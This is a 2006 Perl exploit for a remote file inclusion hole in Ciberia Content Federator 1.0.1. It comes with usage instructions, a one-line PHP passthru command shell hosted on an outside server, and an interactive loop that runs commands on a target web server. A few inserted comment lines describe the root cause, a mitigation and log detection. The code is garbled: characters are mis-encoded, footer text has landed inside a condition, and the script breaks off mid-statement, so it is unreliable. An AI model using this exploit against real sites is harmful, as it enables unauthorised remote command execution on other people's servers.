1 #!/usr/bin/perl
2 ##
3 # Portal Name : ciberia 1.0<(Ciberia Content Federator)>(maquetacion_socio.php) Remote File Inclusion Exploit
4 # BUG: [Path]/socios/maquetacion_socio.php?path=Dr.Trojan.TxT
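5 # Vulnerable Code: 1-include "$path/datos/datos_socios.php"; 2-include "$path/elementos/actos.php"; 3-include "$path/datos/datos_ciberinvitados.php";
# Root cause: the `path` value taken from the request (see the BUG line above) is used as the prefix of all three include paths, apparently without the script setting it first, so the caller decides where the included files come from.
# Mitigation: assign $path from server-side configuration before these includes, never from the request, and keep PHP's allow_url_include (on PHP older than 5.2, allow_url_fopen) disabled so that include cannot fetch remote URLs.
# Detection: review web-server access logs for requests to socios/maquetacion_socio.php whose `path` parameter contains a URL scheme such as http://.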
6 # Bug Found DeltahackingTEAM Discovery :Dr.Pantagon Expl0iteT:Dr.Trojan
7 ##
8 # Download =http://switch.dl.sourceforge.net/sourceforge/ciberia/ciberia-1.0.1.tar.gz
9 ##
10 # usage:perl deltaSecurity.pl <target> <cmd shell location> <cmd shell variable>
11 #
12 #
13 # perl deltaSecurity.pl http://[target]/[Path]/socios/ http://site.com/cmd.txt cmd
14 #
15 # cmd shell example: <?passthru($_GET[cmd]);?>
16 #
17 # cmd shell variable: ($_GET[cmd]);
18 ##
19 ##
20 #Greetz: Hiv++, D_7j ,Vpc,Lord,Str0ke,
21 #
22 # Contact:dr.trojan[A]deltasecurity.ir info[A]takserver.ir Davood_cracker[A]yahoo.com
23 ##
24 # WebSite:www.deltasecurity.ir
25 ##
26 #128 Bit Security Server:www.takserver.ir
27 ##
28 #SP FUCK.............: z_zer0c00l(floozie Mother Test 100%=z_zer0c00l=misbegotten:D)..........
29 ##
30
31 use LWP::UserAgent;
32 $Path = $ARGV[0];
33 $Pathtocmd = $ARGV[1];
34 $cmdv = $ARGV[2];
35 if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
36 head();
37 while()
38 {
39 print "[shell] \__DOCTEXT__quot;;
40 while(<STDIN>)
41 {
42 $cmd=$_;
43 chomp($cmd);
44 $xpl = LWP::UserAgent−>new() or die;
45 $req = HTTP::Request−>new(GET =>$Path.’maquetacion_socio.php?path=’.$Pathtocmd.’?&’.$cmdv.’=’.$cmd) or die "\nCould Not connect\n
";
46 $res = $xpl−>request($req);
47 $return = $res−>content;
48 $return =~ tr/[\n]/[?..?.??]/;
49 if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
50 elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/
Ciberia Content Federator 1.0.1 path Remote File Include Exploit
DeltahackingTEAM
12/25/2006
)
51 {print "\nCould N